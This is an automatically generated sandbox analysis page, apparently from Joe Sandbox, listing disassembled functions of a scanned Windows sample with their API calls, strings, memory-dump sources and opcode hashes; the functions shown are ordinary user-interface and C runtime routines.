Instruction ID: 278d382ce89b064aa2fe67626fc97af6b89d0d1c391c511dbfa2008fd9a095ac
Opcode Fuzzy Hash: 888c83df3d2a141162ac5636a7eb7185342563c220d4bec53a2df05ae937859a
Instruction Fuzzy Hash: AF41CF716043058FDB28DF2ADC84A6B77A9BB44302F04496AFC55D7302C739EE49CB98

Function 0045D425 Relevance: 9.1, APIs: 6, Instructions: 83COMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(00000000,00000060,00000060), ref: 0045D481
MulDiv.KERNEL32(00000000,00000060,00000060), ref: 0045D4A9
MulDiv.KERNEL32(00000000,00000060,00000060), ref: 0045D4CF
MulDiv.KERNEL32(00000000,00000060,00000060), ref: 0045D4F7
GetWindowRect.USER32(?,?), ref: 0045D515
GetParent.USER32(?), ref: 0045D534

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: ParentRectWindow
String ID:
API String ID: 2562589006-0
Opcode ID: ee31b9ed9f1bf5e83b5bb19e940ed331f34305224e2b825c6519a4c06925bd9b
Instruction ID: 6e8eb3c2ff0c3c9abfbbbce0f9511f0abd21520a9255e61714809b1d0dea9bf5
Opcode Fuzzy Hash: ee31b9ed9f1bf5e83b5bb19e940ed331f34305224e2b825c6519a4c06925bd9b
Instruction Fuzzy Hash: F43197B5804344BFE720DF64CC48B6B7BA9BF85315F040A6EF88286252D739AC45CB1A

Function 00406AE0 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 310COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00406C91
_memset.LIBCMT ref: 00406E12

Strings

gfff, xrefs: 00406C27
gfff, xrefs: 00406DA8
#32771, xrefs: 00406C9A, 00406E1B

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: _memset
String ID: #32771$gfff$gfff
API String ID: 2102423945-2702632328
Opcode ID: 8911d913cb3ac3fd5c4d14817b25164adc82119f3bc8313daafe3abd5fb729d6
Instruction ID: bf3f9cced6be2979af6416e12ac0f0b63f0135cc6c69f01af3c50674c3501ba9
Opcode Fuzzy Hash: 8911d913cb3ac3fd5c4d14817b25164adc82119f3bc8313daafe3abd5fb729d6
Instruction Fuzzy Hash: 10B138749083844AE725CB29EC557A73F969B53308F0E017BE482A73E2C37D9869C35E

Function 0044E4C0 Relevance: 9.1, APIs: 6, Instructions: 55windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(?,0000110A), ref: 0044E4CF
SendMessageA.USER32(?,0000110A,00000004), ref: 0044E4E7
SendMessageA.USER32(?,0000110A,00000001), ref: 0044E4F6
SendMessageA.USER32(?,0000110A,00000003), ref: 0044E505
SendMessageA.USER32(?,0000110A,00000001,00000000), ref: 0044E519
SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 0044E528

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: e6e3463b0e9534e87a560532e4bc4da84efef312fe05e9998f3a3b09e82b3bc2
Instruction ID: 85151efd9d150f32c402bbfe82aa57d7c1a2f8b0e14c5160d90e11caec23c343
Opcode Fuzzy Hash: e6e3463b0e9534e87a560532e4bc4da84efef312fe05e9998f3a3b09e82b3bc2
Instruction Fuzzy Hash: DDF06931E8172236F633816A7CD5EFB055CBF29BA6F400056FB05AA2C0EA94CC4140A8

Function 004974C0 Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__CreateFrameInfo.LIBCMT ref: 004974E8

Part of subcall function 00496DD1: __getptd.LIBCMT ref: 00496DDF
Part of subcall function 00496DD1: __getptd.LIBCMT ref: 00496DED

__getptd.LIBCMT ref: 004974F2

Part of subcall function 0048BF42: __amsg_exit.LIBCMT ref: 0048BF52

__getptd.LIBCMT ref: 00497500
__getptd.LIBCMT ref: 0049750E
__getptd.LIBCMT ref: 00497519
_CallCatchBlock2.LIBCMT ref: 0049753F

Part of subcall function 00496E76: __CallSettingFrame@12.LIBCMT ref: 00496EC2

Part of subcall function 004975E6: __getptd.LIBCMT ref: 004975F5
Part of subcall function 004975E6: __getptd.LIBCMT ref: 00497603

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit
String ID:
API String ID: 3688206559-0
Opcode ID: 5929fe201b6067f002be34f95261641c1c5899f9458730ee77ae63e047fadc91
Instruction ID: eb0d426b8b813fdda5ad313fd66e19ada090fdf835c28c79ba04448802cb707d
Opcode Fuzzy Hash: 5929fe201b6067f002be34f95261641c1c5899f9458730ee77ae63e047fadc91
Instruction Fuzzy Hash: 9A11D7B1D10209EFDF00EFA5C945BAD7BB0FF08318F1184AAF954A7251DB389A119F58

Function 004CB5E5 Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__CreateFrameInfo.LIBCMT ref: 004CB60D

Part of subcall function 004C6D13: __getptd.LIBCMT ref: 004C6D21
Part of subcall function 004C6D13: __getptd.LIBCMT ref: 004C6D2F

__getptd.LIBCMT ref: 004CB617

Part of subcall function 004C7C01: __amsg_exit.LIBCMT ref: 004C7C11

__getptd.LIBCMT ref: 004CB625
__getptd.LIBCMT ref: 004CB633
__getptd.LIBCMT ref: 004CB63E
_CallCatchBlock2.LIBCMT ref: 004CB664

Part of subcall function 004C6DB8: __CallSettingFrame@12.LIBCMT ref: 004C6E04

Part of subcall function 004CB70B: __getptd.LIBCMT ref: 004CB71A
Part of subcall function 004CB70B: __getptd.LIBCMT ref: 004CB728

Memory Dump Source

Source File: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit
String ID:
API String ID: 3688206559-0
Opcode ID: d356543264eb76a17c83eb32786e724b37d37036bd1d111a158f98afe2d63ad0
Instruction ID: 5abda6b240939824a1493505c261ded846b4e10df163bc76ac826badbf219765
Opcode Fuzzy Hash: d356543264eb76a17c83eb32786e724b37d37036bd1d111a158f98afe2d63ad0
Instruction Fuzzy Hash: CB11E4B99002099FDB41EFA5C846BADBBB0FF04318F10806EE815A7251DB799A119F94

Function 004378A0 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 297COMMON

Download Yara Rule

Strings

ind, xrefs: 004379D8

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: ind
API String ID: 0-166120149
Opcode ID: 26e5b95a95b9c00b02a843827d040c1036ce17297310ad656679d1feca0c1b17
Instruction ID: 0f9efb89bc4f294d5f6b65bfbbdf4f567817217ecab7c051de787f289a1a2e8a
Opcode Fuzzy Hash: 26e5b95a95b9c00b02a843827d040c1036ce17297310ad656679d1feca0c1b17
Instruction Fuzzy Hash: E7915AE150C2446BE731AA218842B7FBBE55F4D348F58291FF9C457382D26D9E05839F

Function 00438378 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 221COMMON

Download Yara Rule

Strings

user32, xrefs: 0043871C
GetLayeredWindowAttributes, xrefs: 00438717
0x%08X, xrefs: 004386B5

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: 0x%08X$GetLayeredWindowAttributes$user32
API String ID: 0-3911444621
Opcode ID: fccbda92c6f4131673d9dfb5ee2cf67e4fbaff9f6e13d3b09bd755aad115dfbb
Instruction ID: 45c69e0162d8c5470a9c918efe72c57dfd8e530235a01c97ef48e77e05133f49
Opcode Fuzzy Hash: fccbda92c6f4131673d9dfb5ee2cf67e4fbaff9f6e13d3b09bd755aad115dfbb
Instruction Fuzzy Hash: 885117727043052BE720DA69AC81F6BB3C99BE8314F54452FF644973C2DEB8DD4483AA

Function 00438393 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 220COMMON

Download Yara Rule

Strings

user32, xrefs: 0043871C
GetLayeredWindowAttributes, xrefs: 00438717
0x%08X, xrefs: 004386B5

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: 0x%08X$GetLayeredWindowAttributes$user32
API String ID: 0-3911444621
Opcode ID: d60480c3915feebfdef7f0e57e26574239201d46bd111eb33b1056bc06c5634a
Instruction ID: 7c743817d3cda4bd4fa1d1e64ab2761ec2cb1e7875fba42b57740be8825c26c7
Opcode Fuzzy Hash: d60480c3915feebfdef7f0e57e26574239201d46bd111eb33b1056bc06c5634a
Instruction Fuzzy Hash: B2511A7270430527E710DA59AC81F6BB3C99BD8314F54452FF944973C2DEB8DD5483AA

Function 004027B0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 193windowCOMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(?,00000060,00000060), ref: 00402848
MulDiv.KERNEL32(?,00000060,00000060), ref: 00402890
_memset.LIBCMT ref: 00402A8B
SendMessageA.USER32 ref: 00402AC0

Strings

call, xrefs: 00402C12

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: MessageSend_memset
String ID: call
API String ID: 1827994538-3431870270
Opcode ID: 7fdf1ae545b4e3bc320c6cbe7a900f3495994ea5e8a7a217ca975a4cd4659aff
Instruction ID: 9a55ec0397bd9acb193a32bff976fef9b1e8cc60cf23eb997c1b20234d63725b
Opcode Fuzzy Hash: 7fdf1ae545b4e3bc320c6cbe7a900f3495994ea5e8a7a217ca975a4cd4659aff
Instruction Fuzzy Hash: E881E070608340DFE724DF14C888BABB7E5BF84308F14892EE4999B3D1D7B9A944CB56

Function 004228B0 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 173COMMON

Download Yara Rule

APIs

_strncpy.LIBCMT ref: 00422905
_memmove.LIBCMT ref: 00422A8B

Part of subcall function 0048A253: __mbsrchr_l.LIBCMT ref: 0048A260

Strings

Function name too long., xrefs: 004228E4
Out of memory., xrefs: 0042299E
Invalid method name., xrefs: 004229CC

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: __mbsrchr_l_memmove_strncpy
String ID: Function name too long.$Invalid method name.$Out of memory.
API String ID: 245290770-2619123988
Opcode ID: 81af49644e340f0a4276bc141e3b3ff61e99552d6e0c2e9bf4b3724e68884ea0
Instruction ID: 154e6616932af313e324220689a8f1a4a70fe39b8d93749f280b64df84b87091
Opcode Fuzzy Hash: 81af49644e340f0a4276bc141e3b3ff61e99552d6e0c2e9bf4b3724e68884ea0
Instruction Fuzzy Hash: 185106B1700326ABD720EF65E981AA7B3A5AB50314F84463FE90487341EBBDDC49C798

Function 00404006 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 119COMMON

Download Yara Rule

APIs

__fassign.LIBCMT ref: 00404069

Part of subcall function 0048828D: __mbsnbicmp_l.LIBCMT ref: 0048829D

Strings

/ErrorStdOut, xrefs: 00404063
A_Args, xrefs: 004040E4, 00404115
/force, xrefs: 0040404F
/restart, xrefs: 0040402B

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: __fassign__mbsnbicmp_l
String ID: /ErrorStdOut$/force$/restart$A_Args
API String ID: 3053643802-1312556939
Opcode ID: 691809e257577b084b235a7c6553c7163b064567e76f4b52b2cfe7d299b648ba
Instruction ID: 368e8453b3402cffb1c970dd5a593df201366ac60e1f86357681a9d076befd83
Opcode Fuzzy Hash: 691809e257577b084b235a7c6553c7163b064567e76f4b52b2cfe7d299b648ba
Instruction Fuzzy Hash: 553128B17042015BEA20EB61AC42F6B3684DFD5318F04453FEB44A72C2EB3CD90687AE

Function 00476B50 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 116COMMON

Download Yara Rule

Strings

(, xrefs: 00476BDC

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: (
API String ID: 0-3887548279
Opcode ID: 0b22c6aaf98f7b02ad9e4d6a98cb6c3d52d4ebba5ae718e447a76a9f26b5aefe
Instruction ID: 177d11c41e03e3e259d4928811fb4dc076fe8b1d1e2b0a63a6af47ba2fc596bb
Opcode Fuzzy Hash: 0b22c6aaf98f7b02ad9e4d6a98cb6c3d52d4ebba5ae718e447a76a9f26b5aefe
Instruction Fuzzy Hash: 7F41DFB1D00319AEDB10DFA4DC45BEEBBF9EB48700F10415AB508E7241D7749944CB64

Function 004969B2 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 109COMMON

Download Yara Rule

APIs

PMDtoOffset.LIBCMT ref: 00496A86
std::bad_exception::bad_exception.LIBCMT ref: 00496AB0

Strings

Bad dynamic_cast!, xrefs: 00496AA8

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Offsetstd::bad_exception::bad_exception
String ID: Bad dynamic_cast!
API String ID: 3590147389-2956939130
Opcode ID: cb181549111ebfde1e97a6a0ea35433161e723f7b96b9b3d72542aeb4f17e0c8
Instruction ID: 241c99db9853f7c090762e3e0943d79517b0a0b0900732ad68c201b20e0c9418
Opcode Fuzzy Hash: cb181549111ebfde1e97a6a0ea35433161e723f7b96b9b3d72542aeb4f17e0c8
Instruction Fuzzy Hash: 30319371A002159FCF14DF64C881AAE7BB0AF49315F26846BE905F7391D73CEC418B98

Function 004371F0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 99COMMON

Download Yara Rule

APIs

_strncpy.LIBCMT ref: 00437234
__wcstoi64.LIBCMT ref: 00437271
__wcstoi64.LIBCMT ref: 004372BF
__wcstoi64.LIBCMT ref: 004372EB

Part of subcall function 0048A030: __atof_l.LIBCMT ref: 0048A03A

Part of subcall function 00489456: __wcstoi64.LIBCMT ref: 0048944C

Strings

msctls_statusbar321, xrefs: 00437249

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: __wcstoi64$__atof_l_strncpy
String ID: msctls_statusbar321
API String ID: 2297704726-1022929942
Opcode ID: f9fc5966c1af48000ae4e9277a78ee8eb1821f83a80b8170b67beef90bcfe883
Instruction ID: e4d61ba0a82d08c91a0f7634d7f94b43da7fc7c50f21b85a8c55976f7c866e3e
Opcode Fuzzy Hash: f9fc5966c1af48000ae4e9277a78ee8eb1821f83a80b8170b67beef90bcfe883
Instruction Fuzzy Hash: D8313CB190834177D330BA269C02BAF76985F8D718F08087EF98A57283F97D9819835B

Function 00454010 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 92COMMON

Download Yara Rule

APIs

Part of subcall function 00488EC1: __mbschr_l.LIBCMT ref: 00488ECE

__wsplitpath.LIBCMT ref: 00454065
__wsplitpath.LIBCMT ref: 0045407C

Strings

., xrefs: 0045409F
*, xrefs: 004540F8
., xrefs: 00454084

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: __wsplitpath$__mbschr_l
String ID: *$.$.
API String ID: 1083000182-2112782162
Opcode ID: 05981d1e0442288bffe7f58dae3bcd8f96468017518f74f824c8412e889f8e6f
Instruction ID: 2404d4d3ddec0427ab402e7fca17b37f73382c582ded1e308f87779c7470ae25
